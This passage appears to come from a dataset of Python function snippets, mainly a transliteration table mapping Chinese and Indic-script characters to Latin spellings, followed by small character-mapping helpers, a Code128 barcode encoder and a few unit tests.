self.trans[char] = u\"teng\"\n for char in u\"梯剔踢锑提题蹄啼体替嚏惕涕剃屉\":\n self.trans[char] = u\"ti\"\n for char in u\"兲天添填田甜恬舔腆\":\n self.trans[char] = u\"tian\"\n for char in u\"挑条迢眺跳\":\n self.trans[char] = u\"tiao\"\n for char in u\"贴铁帖\":\n self.trans[char] = u\"tie\"\n for char in u\"厅听烃汀廷停亭庭挺艇\":\n self.trans[char] = u\"ting\"\n for char in u\"通桐酮瞳同铜彤童桶捅筒统痛\":\n self.trans[char] = u\"tong\"\n for char in u\"偷投头透\":\n self.trans[char] = u\"tou\"\n for char in u\"凸秃突图徒途涂屠土吐兔\":\n self.trans[char] = u\"tu\"\n for char in u\"湍团\":\n self.trans[char] = u\"tuan\"\n for char in u\"推颓腿蜕褪退\":\n self.trans[char] = u\"tui\"\n for char in u\"吞屯臀\":\n self.trans[char] = u\"tun\"\n for char in u\"拖托脱鸵陀驮驼椭妥拓唾\":\n self.trans[char] = u\"tuo\"\n for char in u\"挖哇蛙洼娃瓦袜\":\n self.trans[char] = u\"wa\"\n for char in u\"歪外\":\n self.trans[char] = u\"wai\"\n for char in u\"豌弯湾玩顽丸烷完碗挽晚皖惋宛婉万腕莞\":\n self.trans[char] = u\"wan\"\n for char in u\"汪王亡枉网往旺望忘妄\":\n self.trans[char] = u\"wang\"\n for char in u\"威巍微危韦违桅围唯惟为潍维苇萎委伟伪尾纬未蔚味畏胃喂魏位渭谓尉慰卫\":\n self.trans[char] = u\"wei\"\n for char in u\"瘟温蚊文闻纹吻稳紊问\":\n self.trans[char] = u\"wen\"\n for char in u\"嗡翁瓮\":\n self.trans[char] = u\"weng\"\n for char in u\"挝蜗涡窝我斡卧握沃\":\n self.trans[char] = u\"wo\"\n for char in u\"巫呜钨乌污诬屋无芜梧吾吴毋武五捂午舞伍侮坞戊雾晤物勿务悟误\":\n self.trans[char] = u\"wu\"\n for char in u\"昔熙析西硒矽晰嘻吸锡牺稀息希悉膝夕惜熄烯溪汐犀檄袭席习媳喜铣洗系隙戏细\":\n self.trans[char] = u\"xi\"\n for char in u\"瞎虾匣霞辖暇峡侠狭下厦夏吓\":\n self.trans[char] = u\"xia\"\n for char in u\"掀锨先仙鲜纤咸贤衔舷闲涎弦嫌显险现献县腺馅羡宪陷限线\":\n self.trans[char] = u\"xian\"\n for char in u\"相厢镶香箱襄湘乡翔祥详想响享项巷橡像向象\":\n self.trans[char] = u\"xiang\"\n for char in u\"萧硝霄削哮嚣销消宵淆晓小孝校肖啸笑效\":\n self.trans[char] = u\"xiao\"\n for char in u\"楔些歇蝎鞋协挟携邪斜胁谐写械卸蟹懈泄泻谢屑\":\n self.trans[char] = u\"xie\"\n for char in u\"薪芯锌欣辛新忻心信衅\":\n self.trans[char] = u\"xin\"\n for char in u\"星腥猩惺兴刑型形邢行醒幸杏性姓\":\n self.trans[char] = u\"xing\"\n for char in u\"兄凶胸匈汹雄熊\":\n self.trans[char] = u\"xiong\"\n for char in u\"休修羞朽嗅锈秀袖绣\":\n self.trans[char] = u\"xiu\"\n for char in u\"墟戌需虚嘘须徐许蓄酗叙旭序畜恤絮婿绪续\":\n self.trans[char] = u\"xu\"\n for char in u\"轩喧宣悬旋玄选癣眩绚\":\n self.trans[char] = u\"xuan\"\n for char in u\"靴薛学穴雪血\":\n self.trans[char] = u\"xue\"\n for char in u\"勋熏循旬询寻驯巡殉汛训讯逊迅\":\n self.trans[char] = u\"xun\"\n for char in u\"压押鸦鸭呀丫芽牙蚜崖衙涯雅哑亚讶\":\n self.trans[char] = u\"ya\"\n for char in u\"焉咽阉烟淹盐严研蜒岩延言颜阎炎沿奄掩眼衍演艳堰燕厌砚雁唁彦焰宴谚验\":\n self.trans[char] = u\"yan\"\n for char in u\"殃央鸯秧杨扬佯疡羊洋阳氧仰痒养样漾\":\n self.trans[char] = u\"yang\"\n for char in u\"邀腰妖瑶摇尧遥窑谣姚咬舀药要耀\":\n self.trans[char] = u\"yao\"\n for char in u\"椰噎耶爷野冶也页掖业叶曳腋夜液\":\n self.trans[char] = u\"ye\"\n for char in u\"一壹医揖铱依伊衣颐夷遗移仪胰疑沂宜姨彝椅蚁倚已乙矣以艺抑易邑屹亿役臆逸肄疫亦裔意毅忆义益溢诣议谊译异翼翌绎\":\n self.trans[char] = u\"yi\"\n for char in u\"茵荫因殷音阴姻吟银淫寅饮尹引隐印\":\n self.trans[char] = u\"yin\"\n for char in u\"英樱婴鹰应缨莹萤营荧蝇迎赢盈影颖硬映\":\n self.trans[char] = u\"ying\"\n self.trans['哟'] = 'yo'\n for char in u\"拥佣臃痈庸雍踊蛹咏泳涌永恿勇用\":\n self.trans[char] = u\"yong\"\n for char in u\"幽优悠忧尤由邮铀犹油游酉有友右佑釉诱又幼迂\":\n self.trans[char] = u\"you\"\n for char in u\"淤于盂榆虞愚舆余俞逾鱼愉渝渔隅予娱雨与屿禹宇语羽玉域芋郁吁遇喻峪御愈欲狱育誉浴寓裕预豫驭\":\n self.trans[char] = u\"yu\"\n for char in u\"鸳渊冤元垣袁原援辕园员圆猿源缘远苑愿怨院\":\n self.trans[char] = u\"yuan\"\n for char in u\"曰约越跃钥岳粤月悦阅\":\n self.trans[char] = u\"yue\"\n for char in u\"耘云郧匀陨允运蕴酝晕韵孕\":\n self.trans[char] = u\"yun\"\n for char in u\"匝砸杂\":\n self.trans[char] = u\"za\"\n for char in u\"栽哉灾宰载再在\":\n self.trans[char] = u\"zai\"\n for char in u\"咱攒暂赞\":\n self.trans[char] = u\"zan\"\n for char in u\"赃脏葬\":\n self.trans[char] = u\"zang\"\n for char in u\"遭糟凿藻枣早澡蚤躁噪造皂灶燥\":\n self.trans[char] = u\"zao\"\n for char in u\"责择则泽\":\n self.trans[char] = u\"ze\"\n self.trans['贼'] = 'zei'\n self.trans['怎'] = 'zen'\n for char in u\"增憎曾赠\":\n self.trans[char] = u\"zeng\"\n for char in u\"扎喳渣札轧铡闸眨栅榨咋乍炸诈\":\n self.trans[char] = u\"zha\"\n for char in u\"摘斋宅窄债寨\":\n self.trans[char] = u\"zhai\"\n for char in u\"瞻毡詹粘沾盏斩辗崭展蘸栈占战站湛绽\":\n self.trans[char] = u\"zhan\"\n for char in u\"樟章彰漳张掌涨杖丈帐账仗胀瘴障\":\n self.trans[char] = u\"zhang\"\n for char in u\"招昭找沼赵照罩兆肇召\":\n self.trans[char] = u\"zhao\"\n for char in u\"遮折哲蛰辙者锗蔗这浙\":\n self.trans[char] = u\"zhe\"\n for char in u\"珍斟真甄砧臻贞针侦枕疹诊震振镇阵圳\":\n self.trans[char] = u\"zhen\"\n for char in u\"蒸挣睁征狰争怔整拯正政帧症郑证\":\n self.trans[char] = u\"zheng\"\n for char in u\"芝枝支吱蜘知肢脂汁之织职直植殖执值侄址指止趾只旨纸志挚掷至致置帜峙制智秩稚质炙痔滞治窒\":\n self.trans[char] = u\"zhi\"\n for char in u\"中盅忠钟衷终种肿重仲众\":\n self.trans[char] = u\"zhong\"\n for char in u\"舟周州洲诌粥轴肘帚咒皱宙昼骤\":\n self.trans[char] = u\"zhou\"\n for char in u\"珠株蛛朱猪诸诛逐竹烛煮拄瞩嘱主著柱助蛀贮铸筑住注祝驻\":\n self.trans[char] = u\"zhu\"\n for char in u\"抓爪\":\n self.trans[char] = u\"zhua\"\n self.trans['拽'] = 'zhuai'\n for char in u\"专砖转撰赚篆\":\n self.trans[char] = u\"zhuan\"\n for char in u\"桩庄装妆撞壮状\":\n self.trans[char] = u\"zhuang\"\n for char in u\"椎锥追赘坠缀\":\n self.trans[char] = u\"zhui\"\n for char in u\"谆准\":\n self.trans[char] = u\"zhun\"\n for char in u\"捉拙卓桌琢茁酌啄着灼浊\":\n self.trans[char] = u\"zhuo\"\n for char in u\"兹咨资姿滋淄孜紫仔籽滓子自渍字\":\n self.trans[char] = u\"zi\"\n for char in u\"鬃棕踪宗综总纵\":\n self.trans[char] = u\"zong\"\n for char in u\"邹走奏揍\":\n self.trans[char] = u\"zou\"\n for char in u\"租足卒族祖诅阻组\":\n self.trans[char] = u\"zu\"\n for char in u\"钻纂\":\n self.trans[char] = u\"zuan\"\n for char in u\"嘴醉最罪\":\n self.trans[char] = u\"zui\"\n for char in u\"尊遵\":\n self.trans[char] = u\"zun\"\n for char in u\"昨左佐柞做作坐座\":\n self.trans[char] = u\"zuo\"\n # from: https://www.wikidata.org/wiki/MediaWiki:Gadget-SimpleTransliterate.js\n self.trans[u\"ଂ\"] = \"anusvara\"\n self.trans[u\"ઇ\"] = \"i\"\n self.trans[u\"എ\"] = \"e\"\n self.trans[u\"ગ\"] = \"ga\"\n self.trans[u\"ਜ\"] = \"ja\"\n self.trans[u\"ഞ\"] = \"nya\"\n self.trans[u\"ଢ\"] = \"ddha\"\n self.trans[u\"ધ\"] = \"dha\"\n self.trans[u\"ਬ\"] = \"ba\"\n self.trans[u\"മ\"] = \"ma\"\n self.trans[u\"ଲ\"] = \"la\"\n self.trans[u\"ષ\"] = \"ssa\"\n self.trans[u\"਼\"] = \"nukta\"\n self.trans[u\"ാ\"] = \"aa\"\n self.trans[u\"ୂ\"] = \"uu\"\n self.trans[u\"ે\"] = \"e\"\n self.trans[u\"ੌ\"] = \"au\"\n self.trans[u\"ൎ\"] = \"reph\"\n self.trans[u\"ੜ\"] = \"rra\"\n self.trans[u\"՞\"] = \"?\"\n self.trans[u\"ୢ\"] = \"l\"\n self.trans[u\"૧\"] = \"1\"\n self.trans[u\"੬\"] = \"6\"\n self.trans[u\"൮\"] = \"8\"\n self.trans[u\"୲\"] = \"quarter\"\n self.trans[u\"ൾ\"] = \"ll\"\n self.trans[u\"ਇ\"] = \"i\"\n self.trans[u\"ഉ\"] = \"u\"\n self.trans[u\"ઌ\"] = \"l\"\n self.trans[u\"ਗ\"] = \"ga\"\n self.trans[u\"ങ\"] = \"nga\"\n self.trans[u\"ଝ\"] = \"jha\"\n self.trans[u\"જ\"] = \"ja\"\n self.trans[u\"؟\"] = \"?\"\n self.trans[u\"ਧ\"] = \"dha\"\n self.trans[u\"ഩ\"] = \"nnna\"\n self.trans[u\"ଭ\"] = \"bha\"\n self.trans[u\"બ\"] = \"ba\"\n self.trans[u\"ഹ\"] = \"ha\"\n self.trans[u\"ଽ\"] = \"avagraha\"\n self.trans[u\"઼\"] = \"nukta\"\n self.trans[u\"ੇ\"] = \"ee\"\n self.trans[u\"୍\"] = \"virama\"\n self.trans[u\"ૌ\"] = \"au\"\n self.trans[u\"੧\"] = \"1\"\n self.trans[u\"൩\"] = \"3\"\n self.trans[u\"୭\"] = \"7\"\n self.trans[u\"૬\"] = \"6\"\n self.trans[u\"൹\"] = \"mark\"\n self.trans[u\"ਖ਼\"] = \"khha\"\n self.trans[u\"ਂ\"] = \"bindi\"\n self.trans[u\"ഈ\"] = \"ii\"\n self.trans[u\"ઍ\"] = \"e\"\n self.trans[u\"ଌ\"] = \"l\"\n self.trans[u\"ഘ\"] = \"gha\"\n self.trans[u\"ઝ\"] = \"jha\"\n self.trans[u\"ଡ଼\"] = \"rra\"\n self.trans[u\"ਢ\"] = \"ddha\"\n self.trans[u\"ന\"] = \"na\"\n self.trans[u\"ભ\"] = \"bha\"\n self.trans[u\"ବ\"] = \"ba\"\n self.trans[u\"ਲ\"] = \"la\"\n self.trans[u\"സ\"] = \"sa\"\n self.trans[u\"ઽ\"] = \"avagraha\"\n self.trans[u\"଼\"] = \"nukta\"\n self.trans[u\"ੂ\"] = \"uu\"\n self.trans[u\"ൈ\"] = \"ai\"\n self.trans[u\"્\"] = \"virama\"\n self.trans[u\"ୌ\"] = \"au\"\n self.trans[u\"൨\"] = \"2\"\n self.trans[u\"૭\"] = \"7\"\n self.trans[u\"୬\"] = \"6\"\n self.trans[u\"ੲ\"] = \"iri\"\n self.trans[u\"ഃ\"] = \"visarga\"\n self.trans[u\"ં\"] = \"anusvara\"\n self.trans[u\"ଇ\"] = \"i\"\n self.trans[u\"ഓ\"] = \"oo\"\n self.trans[u\"ଗ\"] = \"ga\"\n self.trans[u\"ਝ\"] = \"jha\"\n self.trans[u\"?\"] = \"?\"\n self.trans[u\"ണ\"] = \"nna\"\n self.trans[u\"ઢ\"] = \"ddha\"\n self.trans[u\"ଧ\"] = \"dha\"\n self.trans[u\"ਭ\"] = \"bha\"\n self.trans[u\"ള\"] = \"lla\"\n self.trans[u\"લ\"] = \"la\"\n self.trans[u\"ଷ\"] = \"ssa\"\n self.trans[u\"ൃ\"] = \"r\"\n self.trans[u\"ૂ\"] = \"uu\"\n self.trans[u\"େ\"] = \"e\"\n self.trans[u\"੍\"] = \"virama\"\n self.trans[u\"ୗ\"] = \"mark\"\n self.trans[u\"ൣ\"] = \"ll\"\n self.trans[u\"ૢ\"] = \"l\"\n self.trans[u\"୧\"] = \"1\"\n self.trans[u\"੭\"] = \"7\"\n self.trans[u\"൳\"] = \"1/4\"\n self.trans[u\"୷\"] = \"sixteenths\"\n self.trans[u\"ଆ\"] = \"aa\"\n self.trans[u\"ઋ\"] = \"r\"\n self.trans[u\"ഊ\"] = \"uu\"\n self.trans[u\"ਐ\"] = \"ai\"\n self.trans[u\"ଖ\"] = \"kha\"\n self.trans[u\"છ\"] = \"cha\"\n self.trans[u\"ച\"] = \"ca\"\n self.trans[u\"ਠ\"] = \"ttha\"\n self.trans[u\"ଦ\"] = \"da\"\n self.trans[u\"ફ\"] = \"pha\"\n self.trans[u\"പ\"] = \"pa\"\n self.trans[u\"ਰ\"] = \"ra\"\n self.trans[u\"ଶ\"] = \"sha\"\n self.trans[u\"ഺ\"] = \"ttta\"\n self.trans[u\"ੀ\"] = \"ii\"\n self.trans[u\"ો\"] = \"o\"\n self.trans[u\"ൊ\"] = \"o\"\n self.trans[u\"ୖ\"] = \"mark\"\n self.trans[u\"୦\"] = \"0\"\n self.trans[u\"૫\"] = \"5\"\n self.trans[u\"൪\"] = \"4\"\n self.trans[u\"ੰ\"] = \"tippi\"\n self.trans[u\"୶\"] = \"eighth\"\n self.trans[u\"ൺ\"] = \"nn\"\n self.trans[u\"ଁ\"] = \"candrabindu\"\n self.trans[u\"അ\"] = \"a\"\n self.trans[u\"ઐ\"] = \"ai\"\n self.trans[u\"ക\"] = \"ka\"\n self.trans[u\"ਸ਼\"] = \"sha\"\n self.trans[u\"ਛ\"] = \"cha\"\n self.trans[u\"ଡ\"] = \"dda\"\n self.trans[u\"ઠ\"] = \"ttha\"\n self.trans[u\"ഥ\"] = \"tha\"\n self.trans[u\"ਫ\"] = \"pha\"\n self.trans[u\"ર\"] = \"ra\"\n self.trans[u\"വ\"] = \"va\"\n self.trans[u\"ୁ\"] = \"u\"\n self.trans[u\"ી\"] = \"ii\"\n self.trans[u\"ੋ\"] = \"oo\"\n self.trans[u\"ૐ\"] = \"om\"\n self.trans[u\"ୡ\"] = \"ll\"\n self.trans[u\"ૠ\"] = \"rr\"\n self.trans[u\"੫\"] = \"5\"\n self.trans[u\"ୱ\"] = \"wa\"\n self.trans[u\"૰\"] = \"sign\"\n self.trans[u\"൵\"] = \"quarters\"\n self.trans[u\"ਫ਼\"] = \"fa\"\n self.trans[u\"ઁ\"] = \"candrabindu\"\n self.trans[u\"ਆ\"] = \"aa\"\n self.trans[u\"ઑ\"] = \"o\"\n self.trans[u\"ଐ\"] = \"ai\"\n self.trans[u\"ഔ\"] = \"au\"\n self.trans[u\"ਖ\"] = \"kha\"\n self.trans[u\"ડ\"] = \"dda\"\n self.trans[u\"ଠ\"] = \"ttha\"\n self.trans[u\"ത\"] = \"ta\"\n self.trans[u\"ਦ\"] = \"da\"\n self.trans[u\"ର\"] = \"ra\"\n self.trans[u\"ഴ\"] = \"llla\"\n self.trans[u\"ુ\"] = \"u\"\n self.trans[u\"ୀ\"] = \"ii\"\n self.trans[u\"ൄ\"] = \"rr\"\n self.trans[u\"ૡ\"] = \"ll\"\n self.trans[u\"ୠ\"] = \"rr\"\n self.trans[u\"੦\"] = \"0\"\n self.trans[u\"૱\"] = \"sign\"\n self.trans[u\"୰\"] = \"isshar\"\n self.trans[u\"൴\"] = \"1/2\"\n self.trans[u\"ਁ\"] = \"bindi\"\n self.trans[u\"આ\"] = \"aa\"\n self.trans[u\"ଋ\"] = \"r\"\n self.trans[u\"ഏ\"] = \"ee\"\n self.trans[u\"ખ\"] = \"kha\"\n self.trans[u\"ଛ\"] = \"cha\"\n self.trans[u\"ട\"] = \"tta\"\n self.trans[u\"ਡ\"] = \"dda\"\n self.trans[u\"દ\"] = \"da\"\n self.trans[u\"ଫ\"] = \"pha\"\n self.trans[u\"യ\"] = \"ya\"\n self.trans[u\"શ\"] = \"sha\"\n self.trans[u\"ി\"] = \"i\"\n self.trans[u\"ੁ\"] = \"u\"\n self.trans[u\"ୋ\"] = \"o\"\n self.trans[u\"ੑ\"] = \"udaat\"\n self.trans[u\"૦\"] = \"0\"\n self.trans[u\"୫\"] = \"5\"\n self.trans[u\"൯\"] = \"9\"\n self.trans[u\"ੱ\"] = \"addak\"\n self.trans[u\"ൿ\"] = \"k\"\n self.trans[u\"ആ\"] = \"aa\"\n self.trans[u\"ଊ\"] = \"uu\"\n self.trans[u\"એ\"] = \"e\"\n self.trans[u\"ਔ\"] = \"au\"\n self.trans[u\"ഖ\"] = \"kha\"\n self.trans[u\"ଚ\"] = \"ca\"\n self.trans[u\"ટ\"] = \"tta\"\n self.trans[u\"ਤ\"] = \"ta\"\n self.trans[u\"ദ\"] = \"da\"\n self.trans[u\"ପ\"] = \"pa\"\n self.trans[u\"ય\"] = \"ya\"\n self.trans[u\"ശ\"] = \"sha\"\n self.trans[u\"િ\"] = \"i\"\n self.trans[u\"െ\"] = \"e\"\n self.trans[u\"൦\"] = \"0\"\n self.trans[u\"୪\"] = \"4\"\n self.trans[u\"૯\"] = \"9\"\n self.trans[u\"ੴ\"] = \"onkar\"\n self.trans[u\"ଅ\"] = \"a\"\n self.trans[u\"ਏ\"] = \"ee\"\n self.trans[u\"କ\"] = \"ka\"\n self.trans[u\"ઔ\"] = \"au\"\n self.trans[u\"ਟ\"] = \"tta\"\n self.trans[u\"ഡ\"] = \"dda\"\n self.trans[u\"ଥ\"] = \"tha\"\n self.trans[u\"ત\"] = \"ta\"\n self.trans[u\"ਯ\"] = \"ya\"\n self.trans[u\"റ\"] = \"rra\"\n self.trans[u\"ଵ\"] = \"va\"\n self.trans[u\"ਿ\"] = \"i\"\n self.trans[u\"ു\"] = \"u\"\n self.trans[u\"ૄ\"] = \"rr\"\n self.trans[u\"ൡ\"] = \"ll\"\n self.trans[u\"੯\"] = \"9\"\n self.trans[u\"൱\"] = \"100\"\n self.trans[u\"୵\"] = \"sixteenth\"\n self.trans[u\"અ\"] = \"a\"\n self.trans[u\"ਊ\"] = \"uu\"\n self.trans[u\"ഐ\"] = \"ai\"\n self.trans[u\"ક\"] = \"ka\"\n self.trans[u\"ଔ\"] = \"au\"\n self.trans[u\"ਚ\"] = \"ca\"\n self.trans[u\"ഠ\"] = \"ttha\"\n self.trans[u\"થ\"] = \"tha\"\n self.trans[u\"ତ\"] = \"ta\"\n self.trans[u\"ਪ\"] = \"pa\"\n self.trans[u\"ര\"] = \"ra\"\n self.trans[u\"વ\"] = \"va\"\n self.trans[u\"ീ\"] = \"ii\"\n self.trans[u\"ૅ\"] = \"e\"\n self.trans[u\"ୄ\"] = \"rr\"\n self.trans[u\"ൠ\"] = \"rr\"\n self.trans[u\"ਜ਼\"] = \"za\"\n self.trans[u\"੪\"] = \"4\"\n self.trans[u\"൰\"] = \"10\"\n self.trans[u\"୴\"] = \"quarters\"\n self.trans[u\"ਅ\"] = \"a\"\n self.trans[u\"ഋ\"] = \"r\"\n self.trans[u\"ઊ\"] = \"uu\"\n self.trans[u\"ଏ\"] = \"e\"\n self.trans[u\"ਕ\"] = \"ka\"\n self.trans[u\"ഛ\"] = \"cha\"\n self.trans[u\"ચ\"] = \"ca\"\n self.trans[u\"ଟ\"] = \"tta\"\n self.trans[u\"ਥ\"] = \"tha\"\n self.trans[u\"ഫ\"] = \"pha\"\n self.trans[u\"પ\"] = \"pa\"\n self.trans[u\"ଯ\"] = \"ya\"\n self.trans[u\"ਵ\"] = \"va\"\n self.trans[u\"ି\"] = \"i\"\n self.trans[u\"ോ\"] = \"oo\"\n self.trans[u\"ୟ\"] = \"yya\"\n self.trans[u\"൫\"] = \"5\"\n self.trans[u\"૪\"] = \"4\"\n self.trans[u\"୯\"] = \"9\"\n self.trans[u\"ੵ\"] = \"yakash\"\n self.trans[u\"ൻ\"] = \"n\"\n self.trans[u\"ઃ\"] = \"visarga\"\n self.trans[u\"ം\"] = \"anusvara\"\n self.trans[u\"ਈ\"] = \"ii\"\n self.trans[u\"ઓ\"] = \"o\"\n self.trans[u\"ഒ\"] = \"o\"\n self.trans[u\"ਘ\"] = \"gha\"\n self.trans[u\"ଞ\"] = \"nya\"\n self.trans[u\"ણ\"] = \"nna\"\n self.trans[u\"ഢ\"] = \"ddha\"\n self.trans[u\"ਲ਼\"] = \"lla\"\n self.trans[u\"ਨ\"] = \"na\"\n self.trans[u\"ମ\"] = \"ma\"\n self.trans[u\"ળ\"] = \"lla\"\n self.trans[u\"ല\"] = \"la\"\n self.trans[u\"ਸ\"] = \"sa\"\n self.trans[u\"¿\"] = \"?\"\n self.trans[u\"ା\"] = \"aa\"\n self.trans[u\"ૃ\"] = \"r\"\n self.trans[u\"ൂ\"] = \"uu\"\n self.trans[u\"ੈ\"] = \"ai\"\n self.trans[u\"ૣ\"] = \"ll\"\n self.trans[u\"ൢ\"] = \"l\"\n self.trans[u\"੨\"] = \"2\"\n self.trans[u\"୮\"] = \"8\"\n self.trans[u\"൲\"] = \"1000\"\n self.trans[u\"ਃ\"] = \"visarga\"\n self.trans[u\"ଉ\"] = \"u\"\n self.trans[u\"ઈ\"] = \"ii\"\n self.trans[u\"ਓ\"] = \"oo\"\n self.trans[u\"ଙ\"] = \"nga\"\n self.trans[u\"ઘ\"] = \"gha\"\n self.trans[u\"ഝ\"] = \"jha\"\n self.trans[u\"ਣ\"] = \"nna\"\n self.trans[u\"ન\"] = \"na\"\n self.trans[u\"ഭ\"] = \"bha\"\n self.trans[u\"ଜ\"] = \"ja\"\n self.trans[u\"ହ\"] = \"ha\"\n self.trans[u\"સ\"] = \"sa\"\n self.trans[u\"ഽ\"] = \"avagraha\"\n self.trans[u\"ૈ\"] = \"ai\"\n self.trans[u\"്\"] = \"virama\"\n self.trans[u\"୩\"] = \"3\"\n self.trans[u\"૨\"] = \"2\"\n self.trans[u\"൭\"] = \"7\"\n self.trans[u\"ੳ\"] = \"ura\"\n self.trans[u\"ൽ\"] = \"l\"\n self.trans[u\"ઉ\"] = \"u\"\n self.trans[u\"ଈ\"] = \"ii\"\n self.trans[u\"ഌ\"] = \"l\"\n self.trans[u\"ઙ\"] = \"nga\"\n self.trans[u\"ଘ\"] = \"gha\"\n self.trans[u\"ജ\"] = \"ja\"\n self.trans[u\"ਞ\"] = \"nya\"\n self.trans[u\"ନ\"] = \"na\"\n self.trans[u\"ബ\"] = \"ba\"\n self.trans[u\"ਮ\"] = \"ma\"\n self.trans[u\"હ\"] = \"ha\"\n self.trans[u\"ସ\"] = \"sa\"\n self.trans[u\"ਾ\"] = \"aa\"\n self.trans[u\"ૉ\"] = \"o\"\n self.trans[u\"ୈ\"] = \"ai\"\n self.trans[u\"ൌ\"] = \"au\"\n self.trans[u\"૩\"] = \"3\"\n self.trans[u\"୨\"] = \"2\"\n self.trans[u\"൬\"] = \"6\"\n self.trans[u\"੮\"] = \"8\"\n self.trans[u\"ർ\"] = \"rr\"\n self.trans[u\"ଃ\"] = \"visarga\"\n self.trans[u\"ഇ\"] = \"i\"\n self.trans[u\"ਉ\"] = \"u\"\n self.trans[u\"ଓ\"] = \"o\"\n self.trans[u\"ഗ\"] = \"ga\"\n self.trans[u\"ਙ\"] = \"nga\"\n self.trans[u\"ઞ\"] = \"nya\"\n self.trans[u\"ଣ\"] = \"nna\"\n self.trans[u\"ധ\"] = \"dha\"\n self.trans[u\"મ\"] = \"ma\"\n self.trans[u\"ଳ\"] = \"lla\"\n self.trans[u\"ഷ\"] = \"ssa\"\n self.trans[u\"ਹ\"] = \"ha\"\n self.trans[u\"ਗ਼\"] = \"ghha\"\n self.trans[u\"ા\"] = \"aa\"\n self.trans[u\"ୃ\"] = \"r\"\n self.trans[u\"േ\"] = \"ee\"\n self.trans[u\"ൗ\"] = \"mark\"\n self.trans[u\"ଢ଼\"] = \"rha\"\n self.trans[u\"ୣ\"] = \"ll\"\n self.trans[u\"൧\"] = \"1\"\n self.trans[u\"੩\"] = \"3\"\n self.trans[u\"૮\"] = \"8\"\n self.trans[u\"୳\"] = \"half\"\n for char in self.trans:\n value = self.trans[char]\n if value == \"?\":\n continue\n while value.encode(encoding, 'replace').decode(encoding) == \"?\" and value in self.trans:\n assert value != self.trans[value], \"%r == self.trans[%r]!\" % (value, value)\n value = self.trans[value]\n self.trans[char] = value", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def init_letters():\n return ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\n 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z')", "def getCharMapping(tweets):\n text = map(lambda x: x.getText(), tweets)\n allChars = [c for s in text for c in s]\n x = collections.Counter(allChars)\n chars_used = x.most_common()[:max_chars]\n charset = map(lambda x: x[0], chars_used)\n # Add padding, start, end and unknown characters\n mapping = dict((c, i) for i, c in enumerate(charset + ['<s>', '</s>', '<pad>', '<unknown>', '<unknown_test>']))\n dump(mapping, open(char_mapping_filename, 'wb'))\n return mapping", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "def create_word(char_list):", "def preprocess_char(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.subword_vocab_size = len(self.char_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.char_to_id, self.unk_char_list, self.max_word_len), f)", "def char_mapping(sentences):\n chars = [\"\".join([w[0] for w in s]) for s in sentences]\n dico = create_dico(chars)\n dico['<PAD>'] = 10000000\n # dico[';'] = 0\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique characters\" % len(dico))\n return dico, char_to_id, id_to_char", "def makeCode(self, code):\n\n current_charset = None\n pos = sum = 0\n skip = False\n strCode = ''\n for c in range(len(code)):\n if skip:\n skip = False\n continue\n\n # Only switch to char set C if next four chars are digits\n if len(code[c:]) >= 4 and code[c:c + 4].isdigit() and current_charset != self.CharSetC or \\\n len(code[c:]) >= 2 and code[c:c + 2].isdigit() and current_charset == self.CharSetC:\n # If char set C = current and next two chars ar digits, keep C\n if current_charset != self.CharSetC:\n # Switching to Character set C\n if pos:\n strCode += self.ValueEncodings[current_charset['Code C']]\n sum += pos * current_charset['Code C']\n else:\n strCode = self.ValueEncodings[self.CharSetC['START C']]\n sum = self.CharSetC['START C']\n current_charset = self.CharSetC\n pos += 1\n elif code[c] in self.CharSetB and current_charset != self.CharSetB and \\\n not (code[c] in self.CharSetA and current_charset == self.CharSetA):\n # If char in chrset A = current, then just keep that\n # Switching to Character set B\n if pos:\n strCode += self.ValueEncodings[current_charset['Code B']]\n sum += pos * current_charset['Code B']\n else:\n strCode = self.ValueEncodings[self.CharSetB['START B']]\n sum = self.CharSetB['START B']\n current_charset = self.CharSetB\n pos += 1\n elif code[c] in self.CharSetA and current_charset != self.CharSetA and \\\n not (code[c] in self.CharSetB and current_charset == self.CharSetB):\n # if char in chrset B== current, then just keep that\n # Switching to Character set A\n if pos:\n strCode += self.ValueEncodings[current_charset['Code A']]\n sum += pos * current_charset['Code A']\n else:\n strCode += self.ValueEncodings[self.CharSetA['START A']]\n sum = self.CharSetA['START A']\n current_charset = self.CharSetA\n pos += 1\n\n if current_charset == self.CharSetC:\n val = self.CharSetC[code[c:c + 2]]\n skip = True\n else:\n val = current_charset[code[c]]\n\n sum += pos * val\n strCode += self.ValueEncodings[val]\n pos += 1\n\n # Checksum\n checksum = sum % 103\n\n strCode += self.ValueEncodings[checksum]\n\n # The stop character\n strCode += self.ValueEncodings[current_charset['STOP']]\n\n # Termination bar\n strCode += \"11\"\n\n return strCode", "def test_vars_generator(self):\n iterator = vars_generator()\n\n for char_number in range(ord('a'), ord('z') + 1):\n self.assertEqual(next(iterator), chr(char_number))\n self.assertEqual(next(iterator), 'aa')", "def test_unicodeBasic(self):\n input = raw_unicode(\n 